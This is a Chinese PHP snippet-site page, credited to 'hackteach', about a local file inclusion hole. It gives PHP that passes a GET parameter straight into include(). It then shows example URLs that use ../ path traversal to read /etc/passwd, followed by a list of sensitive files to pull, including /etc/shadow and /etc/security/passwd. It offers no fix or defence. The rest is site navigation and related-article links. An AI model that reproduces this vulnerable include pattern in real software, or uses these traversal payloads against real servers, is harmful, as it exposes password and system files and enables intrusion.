php 伪造本地文件包含漏洞的代码

yipeiwu_com6年前 (2020-03-06)PHP代码库

代码:

 
<?php 
$page=$_GET['page']; 
include($page.'php'); 
?> 

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

返回列表

上一篇：Python字符转换

下一篇：PHP生成静态页面详解

Warning: session_destroy() : Trying to destroy uninitialized sessionq错误

经查证，在进行使用session_destroy()函数必须先调用session_start()函数。也就是要有如下代码：复制代码代码如下: <? session_start...

PHP学习笔记之数组篇

一、如何定义数组：在ＰＨＰ中创建数组主要有两种方式，下面就让我们来看看如何创建一个数组（1）直接给每个元素赋值的方法创建数组。格式为：$arrayname[key]=value; 其...

php获取网站根目录物理路径的几种方法(推荐)

在PHP中获取网站根目录物理路径。在php程序开发中经常需要获取当前网站的目录，我们可以通过常量定义获取站点根目录物理路径，方便在程序中使用。下面介绍几种常用的获取网站根目录的方法。...

PHP通过session id 实现session共享和登录验证的代码

先说说，这个机制的用途吧，到现在为止战地知道这个机制有两个方面的用途：首先，多服务器共享session问题，这个大家应该都能够理解的，当一个网站的用户量过大，就会使用服务器集群，例如专...

用PHP伪造referer突破网盘禁止外连的代码

比如我放纳米盘里的文件http://img.namipan.com/downfile/da333ee178bdad6531d1ec1540cf86277c116b6300887600/0...

宜配屋

php 伪造本地文件包含漏洞的代码

相关文章

Warning: session_destroy() : Trying to destroy uninitialized sessionq错误

PHP学习笔记之数组篇

php获取网站根目录物理路径的几种方法(推荐)

PHP通过session id 实现session共享和登录验证的代码

用PHP伪造referer突破网盘禁止外连的代码

© YiPeiWu.com 【宜配屋】粤ICP备17031333号

Powered By Z-BlogPHP. Theme by TOYEAN.

宜配屋

php 伪造本地文件包含漏洞的代码

相关文章

Warning: session_destroy() : Trying to destroy uninitialized sessionq错误

PHP学习笔记之数组篇

php获取网站根目录物理路径的几种方法(推荐)

PHP通过session id 实现session共享和登录验证的代码

用PHP伪造referer突破网盘禁止外连的代码

© YiPeiWu.com 【宜配屋】 粤ICP备17031333号 var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?8aa60ae04b767b2af31903508928acc0"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();

Powered By Z-BlogPHP. Theme by TOYEAN.

© YiPeiWu.com 【宜配屋】粤ICP备17031333号